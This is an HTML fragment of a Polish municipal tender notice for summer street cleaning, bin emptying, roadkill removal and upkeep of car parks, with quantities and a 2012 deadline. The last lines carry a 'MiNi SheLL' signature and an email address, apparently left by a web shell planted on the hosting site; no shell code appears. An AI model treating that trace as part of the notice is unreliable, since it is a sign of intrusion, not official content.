<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - jednokrotne opróżnianie 354 szt. koszy ulicznych i uporządkowanie terenu wokół koszy codziennie do godz. 7 rano,
- dwukrotne opróżnienie 66 szt. koszy ulicznych i uporządkowanie terenu wokół koszy codziennie do godz. 7 rano oraz do godz. 15:00,
- zakupienie i ustawienie w ciągach ulicznych 24 szt. koszy betonowych ośmiokątnych o pojemności 50 l. z wkładem metalowym z popielniczką,
- zakupienie 60 szt wkładów metalowych do koszy betonowych
- utrzymanie czystości i porządku w przejściach podziemnych, tunelu i kładce o łącznej powierzchni 2.982 m2
- usuwanie nieczystości z przejść podziemnych, tunelu i kładki dwa razy w tygodniu (każdy wtorek i piątek tygodnia),
- zamiatanie przejść podziemnych, tunelu i kładki dwa razy w tygodniu (każdy poniedziałek i czwartek tygodnia),
- zamiatanie chodników o powierzchni 229 719 m2 i ścieżek rowerowych o powierzchni 40 000 m2 - 1 krotnie w ciągu sezonu na całej szerokości z wszelkich zanieczyszczeń (piasek, liście, szkło),
- usuwanie darni z chodników o powierzchni 72.370 m2 - ręcznie lub za pomocą środków chemicznych.
- ręczne oczyszczanie jezdni, skrzyżowań i zatok w miejscach utrudniających pracę sprzętem mechanicznym - krotność sprzątania 1 raz w miesiącu na pow. ca 45.000 m2 w okresie sezonu,
- oczyszczanie bezpieczników i krawężników z piasku, darni i innych zanieczyszczeń według wskazań zamawiającego - powierzchnia jednokrotnego oczyszczania 21.423 m2. Zamawiający przewiduje dwukrotne oczyszczanie bezpieczników w okresie sezonu,
- sprzątanie powierzchni dróg i ulic po odpustach - 17 odpustów w okresie trwania umowy, przewidywana łączna powierzchnia do sprzątania 17.000 m2, 
- usuwanie potrąconych zwierząt we wszystkie dni miesiąca o każdej porze dnia wraz z transportem i utylizacją, dyspozycyjność wykonawcy - w ciągu 1 godz. od chwili zgłoszenia wykonania usługi przez zamawiającego - zakres usług określono w ilości 120 szt. w okresie umowy,
- usunięcie odpadów z pasów drogowych według potrzeb i wskazań zamawiającego w ilości ca 35 ton we wszystkie dni kalendarzowe o każdej porze dnia wraz z transportem, składowaniem i utylizacją. Dyspozycyjność wykonawcy w ciągu 1 godziny od chwili zgłoszenia wykonania usługi przez zamawiającego,
- czyszczenie miejsc po kolizjach samochodowych w okresie trwania umowy we wszystkie dni kalendarzowe, o każdej porze dnia (24 godz./dobę). Zamawiający przewiduje ok. 8 wyjazdów. Dyspozycyjność wykonawcy w ciągu 1 godziny od chwili zgłoszenia wykonania usługi przez zamawiającego,
- oczyszczanie pasów drogowych wzdłuż dróg krajowych DK-44 i DK 1-86 wraz z węzłami o łącznej powierzchni 1.188.264,00 m2 z wszelkiego rodzaju śmieci raz w miesiącu. Wykonawca winien skierować do zbierania śmieci każdorazowo co najmniej 3 osoby.     
- letnie utrzymanie parkingów o powierzchni 91.984,50 m2 oraz placów o powierzchni 15.120 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.10.00-3, 90.61.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com